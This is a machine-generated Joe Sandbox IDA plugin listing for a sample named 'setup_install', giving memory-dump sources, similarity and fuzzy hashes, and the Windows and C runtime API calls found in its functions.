                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Process$CloseCurrentErrorHandleLastOpen_errno
                                        • String ID:
                                        • API String ID: 202612177-0
                                        • Opcode ID: 20f68f3ce55c5fb7dcab10714828cc171d1e0c4a8902d942e5e08d9ab4cb9166
                                        • Instruction ID: 4e16b630dc782374b909af75ff6b230731327e639b65ecd3076d44671a641f38
                                        • Opcode Fuzzy Hash: 20f68f3ce55c5fb7dcab10714828cc171d1e0c4a8902d942e5e08d9ab4cb9166
                                        • Instruction Fuzzy Hash: 29F0A97028C20A8FDB04BFB8D5C860EBFA9FB95304FA04A68D80586184EB70D450CF92
                                        APIs
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0048115F
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 004811C9
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00481223
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: TpJ
                                        • API String ID: 3657917519-767725062
                                        • Opcode ID: 1d2cf5396a49d6e0c984b100d03ce8c6fb4d8dc70b3b7b82a8aa4b5ff8a2f3ed
                                        • Instruction ID: 2a15342018b7d0688d85f47dc53d41f141b8bd8bf86cb253088d2a5c45086bb6
                                        • Opcode Fuzzy Hash: 1d2cf5396a49d6e0c984b100d03ce8c6fb4d8dc70b3b7b82a8aa4b5ff8a2f3ed
                                        • Instruction Fuzzy Hash: 07F1EA70604A018BCB147F72C48642EBAA2AF81748F025D3FE6C66B753DB3C95458BDE
                                        APIs
                                          • Part of subcall function 004806B0: pthread_once.LIBWINPTHREAD-1 ref: 004806C2
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0048288F
                                          • Part of subcall function 004271B0: strcmp.MSVCRT ref: 00427210
                                          • Part of subcall function 004271B0: strlen.MSVCRT ref: 00427250
                                          • Part of subcall function 004271B0: strlen.MSVCRT ref: 004272AD
                                          • Part of subcall function 0042A360: strlen.MSVCRT ref: 0042A373
                                          • Part of subcall function 0042A360: memcmp.MSVCRT ref: 0042A392
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 004828EB
                                        • setlocale.MSVCRT ref: 0048291E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen$memcmppthread_mutex_lockpthread_mutex_unlockpthread_oncesetlocalestrcmp
                                        • String ID: lpJ
                                        • API String ID: 767575235-129645102
                                        • Opcode ID: f4e7ea7b920bb83a41b1ffb2eee811422c86285aa018dc66b472828e78b6400a
                                        • Instruction ID: 5b66a2720d131749c7af5220329f047ef30b166624f4ba10eca735f97d6b115f
                                        • Opcode Fuzzy Hash: f4e7ea7b920bb83a41b1ffb2eee811422c86285aa018dc66b472828e78b6400a
                                        • Instruction Fuzzy Hash: 53D1A8B0504A158BCB157F76C4C242EBBA2AF81708F025C3EE6C66B653DB3C95458BDE
                                        APIs
                                        • WaitForMultipleObjects.KERNEL32 ref: 64941FEE
                                        • WaitForSingleObject.KERNEL32 ref: 6494202F
                                        • ResetEvent.KERNEL32 ref: 649420E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Wait$EventMultipleObjectObjectsResetSingle
                                        • String ID: (
                                        • API String ID: 256776027-3887548279
                                        • Opcode ID: d3c9ae8f17cc32a79736f21f62a11dca631848ee47b092781cc3be202f4cd7ef
                                        • Instruction ID: 2acb6de1e463b6cf808bceca97d3fc2d5177aba1762545a1d5e36088cca3590f
                                        • Opcode Fuzzy Hash: d3c9ae8f17cc32a79736f21f62a11dca631848ee47b092781cc3be202f4cd7ef
                                        • Instruction Fuzzy Hash: 3F617D31A882059BEF149FB9D8847DEBBF5FB49395F00843ADA64D7240DB39C449CB52
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: QueryVirtual
                                        • String ID: @
                                        • API String ID: 1804819252-2766056989
                                        • Opcode ID: 0ad7313f9ead9221eb8c65789e7edec8cec91aa77f86457c8cd10a66682170ef
                                        • Instruction ID: d6fe0cab1458b832c70e86a52d2af5a9373d9665c523fa99ecfc29c9e32a706c
                                        • Opcode Fuzzy Hash: 0ad7313f9ead9221eb8c65789e7edec8cec91aa77f86457c8cd10a66682170ef
                                        • Instruction Fuzzy Hash: 3E416A729043059FC700DF69D9C461AFBE4FF84324F458A3EE8889B396E734A804CB99
                                        APIs
                                        • VirtualQuery.KERNEL32 ref: 0040CE2D
                                        • VirtualProtect.KERNEL32 ref: 0040CE87
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004AC0C8), ref: 0040CE94
                                          • Part of subcall function 004995D0: fwrite.MSVCRT ref: 004995FF
                                          • Part of subcall function 004995D0: vfprintf.MSVCRT ref: 0049961F
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499624
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 0049962C
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499631
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499636
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 0049963B
                                          • Part of subcall function 004995D0: abort.MSVCRT ref: 00499640
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499645
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 0049964A
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 0049964F
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499654
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499659
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 0049965E
                                          • Part of subcall function 004995D0: abort.MSVCRT(0040FCCB), ref: 00499663
                                          • Part of subcall function 004995D0: abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                          • Part of subcall function 004995D0: abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                          • Part of subcall function 004995D0: abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$Virtual$ErrorLastProtectQueryfwritevfprintf
                                        • String ID: @
                                        • API String ID: 2966409508-2766056989
                                        • Opcode ID: fef63a2145809f198977734394b5a04657f8bfc594cc6e475c2525769e5c14dd
                                        • Instruction ID: 82fcf79b377032f850574e5fd164cfb7088b60912bd7c2e490d19bebdcc41ca2
                                        • Opcode Fuzzy Hash: fef63a2145809f198977734394b5a04657f8bfc594cc6e475c2525769e5c14dd
                                        • Instruction Fuzzy Hash: 01210EB6904741CFC700DF68D9C461AFBE0BF44314F058A6DD9989B296E738D505CB56
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: *iJ
                                        • API String ID: 667068680-3903676996
                                        • Opcode ID: a103b0ad2cda8f6748e037d8a22b12411a61a1b03717e81dae0606b8106ad7e8
                                        • Instruction ID: 3f432e2ca2cd4e79fa8fd2d104a7ebb07b7a99f005fe7627d3cc23087230de24
                                        • Opcode Fuzzy Hash: a103b0ad2cda8f6748e037d8a22b12411a61a1b03717e81dae0606b8106ad7e8
                                        • Instruction Fuzzy Hash: EBF062B0949310CB87007F786D8429B7EE4EA09350F06847FC889CB255E7798884CFAA
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,6494E16B), ref: 64941496
                                        • GetProcAddress.KERNEL32 ref: 649414B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: _Jv_RegisterClasses$libgcj-13.dll
                                        • API String ID: 1646373207-3682238868
                                        • Opcode ID: 2ad844b0f089499faae888f4c950b0b5eafdb2ed79f281cb841ba6ca8c5237a2
                                        • Instruction ID: 2b1e24c8d12a008354ed845fb6be783c975b6751d250292565460297885cfa37
                                        • Opcode Fuzzy Hash: 2ad844b0f089499faae888f4c950b0b5eafdb2ed79f281cb841ba6ca8c5237a2
                                        • Instruction Fuzzy Hash: A6E01AB46883024BEB057F78C91A71A7FF9ABA3249F518428D885A6648FA30C4748B53
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,?,?,6494E16B), ref: 64941496
                                        • GetProcAddress.KERNEL32 ref: 649414B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                         • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                         • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: _Jv_RegisterClasses$libgcj-13.dll
                                        • API String ID: 1646373207-3682238868
                                        • Opcode ID: 2a98aba964b574452d4d26b2423b2b56114db18673cc929abbcf86eb663cd14b
                                        • Instruction ID: bf6c873107a7f16b421c1ec91f88494b6e8bcfa71d81f45d3f39beecd13a3bca
                                        • Opcode Fuzzy Hash: 2a98aba964b574452d4d26b2423b2b56114db18673cc929abbcf86eb663cd14b
                                        • Instruction Fuzzy Hash: EBE0E6B45483014BD7057F78891A31E7EF99BE3145F518528CC8556648FA30C4758B53
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: atoisetlocalestrchr
                                        • String ID: .
                                        • API String ID: 1223908000-248832578
                                        • Opcode ID: 6ec695c95e5158b237a47780eb4b63e0ff4ebffa70a992a204c78cef1383d635
                                        • Instruction ID: 7c5a140b2f882e2409502ddfbc57286efd12684de14bcb6eba1c136744b6d7a0
                                        • Opcode Fuzzy Hash: 6ec695c95e5158b237a47780eb4b63e0ff4ebffa70a992a204c78cef1383d635
                                        • Instruction Fuzzy Hash: 31E0ECB59447008AD700BF79C94636BBAE2AB84308F45881DD48447206EB7DD484978B
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: freememcpystrlen
                                        • String ID:
                                        • API String ID: 2208669145-0
                                        • Opcode ID: 2ab6a6bb69dba4b81f6e1775bd98112014c63a5d641f68c432a64163843409ab
                                        • Instruction ID: 8cf230b4ccf6b73842d0ef041665cf0b6e575915a94c8fad3ab30edf6e7e9751
                                        • Opcode Fuzzy Hash: 2ab6a6bb69dba4b81f6e1775bd98112014c63a5d641f68c432a64163843409ab
                                        • Instruction Fuzzy Hash: DB318DB2608701CBD310AF16D4C036BBBE1AFC4755F158B3EE994A7381D339C845978A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: default arg#$}::
                                        • API String ID: 0-679881875
                                        • Opcode ID: 32b4d186b5db8985176cde08edd2a6a4ae9ce77ad432c124186f99cd8d709a3f
                                        • Instruction ID: df8a5a7b58b89c5634e62201303d10433436eb51da331394e4fc84ba8f50b12f
                                        • Opcode Fuzzy Hash: 32b4d186b5db8985176cde08edd2a6a4ae9ce77ad432c124186f99cd8d709a3f
                                        • Instruction Fuzzy Hash: EFB191706087418BC725DF28C0843ABBBE1EF95304F14883EE5D99B391C779A9859B9E
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: $!
                                        • API String ID: 3510742995-2056089098
                                        • Opcode ID: 75c4477164c01be47b3b09597491a462a9f5144fc4faaccd80ff11298ea9104a
                                        • Instruction ID: 95c6e66fab11958b81e94515d9c3f5e489eaffc74bae6fa6de571a43738e1890
                                        • Opcode Fuzzy Hash: 75c4477164c01be47b3b09597491a462a9f5144fc4faaccd80ff11298ea9104a
                                        • Instruction Fuzzy Hash: 08B109B0A097459FC720EF65C18469BFBE1FF88344F05892EE9C887315E738D8848B86
                                        APIs
                                          • Part of subcall function 0041AF30: LeaveCriticalSection.KERNEL32(?,?,?,?,-00000001,-00000001,00000010,0041B8EB), ref: 0041AF6E
                                        • memcpy.MSVCRT ref: 00414325
                                        • memcpy.MSVCRT ref: 00414360
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memcpy$CriticalLeaveSection
                                        • String ID: $!
                                        • API String ID: 2458919216-2056089098
                                        • Opcode ID: 8767fbb23cffaea27ca8312533cfd15556063fd3abc04fb9b899746838427241
                                        • Instruction ID: dcbcd88c7fed299b8523145ed9cc907c76108574820f956a07f0c316ddc8a6cf
                                        • Opcode Fuzzy Hash: 8767fbb23cffaea27ca8312533cfd15556063fd3abc04fb9b899746838427241
                                        • Instruction Fuzzy Hash: 3EA106B0A097459FC720EF69C58469BBBE1FF88344F05892EE9D487315E738D8848B86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .${default arg#$}::
                                        • API String ID: 0-723286900
                                        • Opcode ID: c6d96b694c14d46351e9562ddc7aac9e33231580e7c868bcbb68f16a27e36913
                                        • Instruction ID: 01d6a81849b9b4822f1bd8be0a077cf41f5f6b5cef8e3d6b4fb02a6ce2fba00e
                                        • Opcode Fuzzy Hash: c6d96b694c14d46351e9562ddc7aac9e33231580e7c868bcbb68f16a27e36913
                                        • Instruction Fuzzy Hash: 4971307050C2418BDB118F28C0D47A97BE1AFA5314F1885BEECC99F38BC7B99885DB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: parm#$this$}
                                        • API String ID: 0-728413427
